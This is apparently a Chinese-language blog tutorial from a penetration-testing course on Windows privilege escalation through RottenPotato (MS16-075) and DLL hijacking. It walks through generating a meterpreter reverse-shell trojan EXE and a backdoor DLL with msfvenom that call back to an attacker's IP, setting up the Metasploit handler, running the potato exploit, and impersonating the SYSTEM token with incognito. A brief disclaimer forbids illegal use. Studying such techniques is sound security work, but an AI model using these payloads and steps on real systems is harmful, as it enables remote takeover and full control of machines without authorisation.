权限提升:烂土豆 || DLL 劫持.
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
目录:
权限提升:烂土豆 || DLL 劫持.
提权思想:
RottenPotato (烂士豆) 提权的原理:
DLL 劫持提权原理:
权限提升:烂土豆
第一步:生成一个后台程序.(木马)
第二步:把刚刚生成的程序 上传到要提权服务器 上.
第三步:直接在我们的服务器上安装 msf .
第四步:在 windows 操作系统执行程序,返回我们服务器( kali )
第五步:如果在直接使用 令牌窃取 无效,而且还是 IIS 权限,则上传 烂土豆.
权限提升:DLL 劫持
第一步:信息收集.(收集有没有第三方软件)
第二步:我们自己安装一个一样的,然后使用 火绒剑 分析进程.
第三步:使用生成一个后门的 DLL 文件.
第四步:把生成的 DLL 文件,放在那个一样的的文件下,把原来的文件重新命名.
第五步:直接在我们的服务器上安装 msf .
第六步:当打开第三方软件时,就会进入.
第七步:使用 令牌窃取 技术进行提权.
免责声明:
严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
提权思想:
RottenPotato (烂士豆) 提权的原理:
(1)欺骗 “NT AUTHORITY \ SYSTEM” 账户通过 NTLM 认证到我们控制的TCP终端。
(2)对这个认证过程使用中间人攻击(NTLM重放),为 “NT AUTHORITY \ SYSTEM”
账户本地协商一个安全令牌。这个过程是通过一系列的 Windows API 调用实现的。
(3)模仿这个令牌。只有具有 “模仿安全令牌权限” 的账户才能去模仿别人的令牌。
一般大多数的服务型账户 (IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
所以,一般从web 拿到的 webshell 都是 IIS 服务器权限,是具有这个模仿权限的。
测试过程中,我发现使用已经建好的账户(就是上面说的用户级账户) 去反弹 meterpreter
然后再去执行 EXP 的时候会失败,但使用菜刀( IIS 服务器权限)反弹 meterpreter 就会成功。
非服务类用户权限无法窃取成功(原理)
操作过程:上传烂土豆--执行烂土豆--利用窃取模块--窃取 SYSTEM-成功
DLL 劫持提权原理:
Windows 程序启动的时候需要 DLL,如果这些 DLL 不存在,则可以通过在应用程序要查找的位置
放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下面
的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)
权限提升:烂土豆
第一步:生成一个后台程序.(木马)
后台程序(木马):https://tianyuk.blog.csdn.net/article/details/123541093
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105
lport=4444 -f exe > bgxg.exe
// lhost=kali的IP地址
// lport=端口号(比如4444)
// -f exe > 文件名.exe
第二步:把刚刚生成的程序 上传到要提权服务器 上.
第三步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通)
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
第四步:在 windows 操作系统执行程序,返回我们服务器( kali )
第五步:如果在直接使用 令牌窃取 无效,而且还是 IIS 权限,则上传 烂土豆.
烂土豆下载:windows-kernel-exploits/MS16-075 at master · SecWiki/windows-kernel-exploits · GitHub
getuid //查看权限(是 IIS 权限才使用下面的.)
pwd //查看当前目录
cd C:// //烂土豆目录下.
execute -cH -f ./potato.exe //执行烂土豆
use incognito //窃取令牌模块
list_tokens -u //查看可以窃取权限
impersonate_token "NT AUTHORITY\SYSTEM" //窃取权限
权限提升:DLL 劫持
第一步:信息收集.(收集有没有第三方软件)
第二步:我们自己安装一个一样的(第三方软件),然后使用 火绒剑 分析(第三方软件)进程.
第三步:使用生成一个后门的 DLL 文件.
msfvenom -p windows/meterpreter/reverse_tcp lhost=(kali地址)
lport=端口 -f dll > 和进程一样的文件名.dll
第四步:把生成的 DLL 文件,放在那个一样的(进程)的文件下,把原来的文件重新命名.
第五步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通)
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
第六步:当打开第三方软件时,就会进入.
第七步:使用 令牌窃取 技术进行提权.
getuid //查看权限
use incognito //窃取令牌模块
list_tokens -u //查看可以窃取权限
impersonate_token "NT AUTHORITY\SYSTEM" //窃取权限
学习连接:第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限_哔哩哔哩_bilibili